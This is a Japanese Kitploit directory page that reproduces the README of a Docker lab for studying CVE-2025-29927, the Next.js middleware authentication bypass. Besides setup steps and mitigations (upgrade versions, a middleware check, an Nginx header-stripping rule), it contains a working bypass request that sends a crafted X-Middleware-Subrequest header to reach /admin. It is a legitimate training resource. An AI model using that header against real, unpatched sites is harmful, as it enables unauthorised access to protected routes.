Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
NextJS-CVE-2025-29927-Docker-Lab — Next.js CVE-2025-29927ミドルウェア認証バイパス脆弱性を調査・再現するためのDockerベースのラボ。脆弱なアプリ、再現手順、緩和戦略を含み、教育用のセキュリティ研究向けです。 | Kitploit
ツール/GitHubGitHub/enochgitgamefied/nextjs-cve-2025-29927-docker-lab
認証と認可脆弱性分析ウェブアプリケーション悪用設定ミス学習と教育ラボと実践
GitHubenochgitgamefied/nextjs-cve-2025-29927-docker-lab

NextJS-CVE-2025-29927-Docker-Lab

Next.js CVE-2025-29927ミドルウェア認証バイパス脆弱性を調査・再現するためのDockerベースのラボ。脆弱なアプリ、再現手順、緩和戦略を含み、教育用のセキュリティ研究向けです。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
57ヶ月前未レビュー

🚨 NextJS-CVE-2025-29927-Docker-Lab

このリポジトリは、制御された環境で Next.js CVE-2025-29927 の脆弱性を調査およびデモンストレーションするための Dockerベースのラボ 環境を含んでいます。

⚠️ 免責事項: このラボは教育およびセキュリティ研究目的のみに使用されます。パブリックインターネットに公開したり、本番環境で使用したりしないでください。


📦 特徴

  • ✅ 脆弱なNext.jsアプリケーション
  • ✅ Dockerでコンテナ化
  • ✅ CVE-2025-29927のローカルテスト用に設計
  • ✅ 事前設定済みのルートとUIを含む
  • ✅ セットアップと実行が簡単

🛠 前提条件

以下がインストールされていることを確認してください:

  • Docker (v20以上)
  • Git
  • オプション: Docker外で実行する場合はNode.js

🚀 はじめに

以下の手順に従ってラボをクローンして実行します:

1. リポジトリをクローン

root@kitploit:~
git clone https://github.com/enochgitgamefied/NextJS-CVE-2025-29927-Docker-Lab.git
cd NextJS-CVE-2025-29927-Docker-Lab

2. Dockerでビルドして実行

root@kitploit:~
docker-compose up --build

これにより:

  • Dockerイメージがビルドされる
  • 脆弱なNext.jsサーバーが起動する
  • http://localhost:3000 でアプリが公開される

📂 フォルダ構成

root@kitploit:~
.
├── app/                     # Main Next.js app code
├── public/                  # Static assets (images, etc.)
├── Dockerfile               # Docker setup for app
├── docker-compose.yml       # Compose configuration
├── .env                     # Environment variables (if any)
├── README.md                # You are here

🧪 脆弱性のテスト

🛡️ CVE-2025-29927 - Next.jsミドルウェア認証バイパス

⚠️ 警告: このドキュメントは教育およびセキュリティ研究目的のみに使用されます。脆弱なアプリを本番環境にデプロイしないでください。


🔍 概要

CVE-2025-29927 は、Next.jsミドルウェアにおける重大な認証バイパス脆弱性です。攻撃者は X-Middleware-Subrequest ヘッダーを操作することで、ミドルウェアベースの認証をスキップし、保護されたルートにアクセスできるようになります。


🧪 脆弱性の再現

1. 認証なしで保護されたルートにアクセス

認証なしで /admin のような保護されたルートにアクセスしてみます:

root@kitploit:~
curl http://localhost:3000/admin

期待される動作: アクセスが拒否されるか、認証ページにリダイレクトされる。

脆弱な動作: 認証なしでアクセスが許可される。

2. X-Middleware-Subrequest ヘッダーを使用したミドルウェアのバイパス

X-Middleware-Subrequest ヘッダーを付けてリクエストを送信し、ミドルウェアのチェックをバイパスします:

root@kitploit:~
curl -H "X-Middleware-Subrequest: src/middleware:nowaf" http://localhost:3000/admin

結果: ミドルウェアがバイパスされ、保護されたルートへのアクセスが許可される。


🛡️ 緩和策

1. パッチ適用済みのNext.jsバージョンにアップグレード

Next.jsを脆弱性が修正された以下のバージョンのいずれかに更新します:

  • 14.2.25
  • 15.2.3
root@kitploit:~
npm install next@latest

2. ミドルウェアの強化を実装

ミドルウェアを強化してリクエストを適切に検証し、疑わしいヘッダーを含むものを拒否します:

root@kitploit:~
import { NextResponse } from 'next/server';

export function middleware(request) {
  const subrequestHeader = request.headers.get('x-middleware-subrequest');
  if (subrequestHeader) {
    return new NextResponse('Unauthorized', { status: 401 });
  }
  // Continue with normal processing
  return NextResponse.next();
}

3. リバースプロキシで疑わしいヘッダーを削除するように設定

リバースプロキシ(例: Nginx)を使用している場合、受信リクエストから X-Middleware-Subrequest ヘッダーを削除するように設定します:

root@kitploit:~
location / {
  proxy_pass http://localhost:3000;
  proxy_set_header X-Middleware-Subrequest "";
}

📚 参考文献

  • NVD - CVE-2025-29927
  • Datadog Security Labs Analysis
  • Vercel Postmortem

この VULNERABILITY.md ファイルは、制御された環境でCVE-2025-29927脆弱性を理解し再現するための包括的なガイドを提供します。また、そのようなエクスプロイトからNext.jsアプリケーションを保護するための実践的な緩和策も提供します。

この脆弱性に関する詳細なデモとさらなる洞察については、Techtalkpineが提供する完全な攻撃デモをブログ記事で参照できます。この記事はYouTubeのライブデモにもリンクされています: https://techtalkpine.com/2025/03/demo-for-cve-2025-29927-nextjs/

このセットアップの特定の部分や緩和手順についてさらに説明が必要な場合は、お知らせください。


🧹 後片付け

コンテナを停止して削除するには:

root@kitploit:~
docker-compose down

📚 リソース

  • Next.js Docs
  • Docker Docs
  • OWASP Top 10

⚠️ 法的免責事項

このプロジェクトは教育および研究目的のみを目的としています。すべての適用される法律および倫理ガイドラインに従って使用する責任はあなたにあります。著者は誤用または損害について一切の責任を負いません。

ツールをダウンロード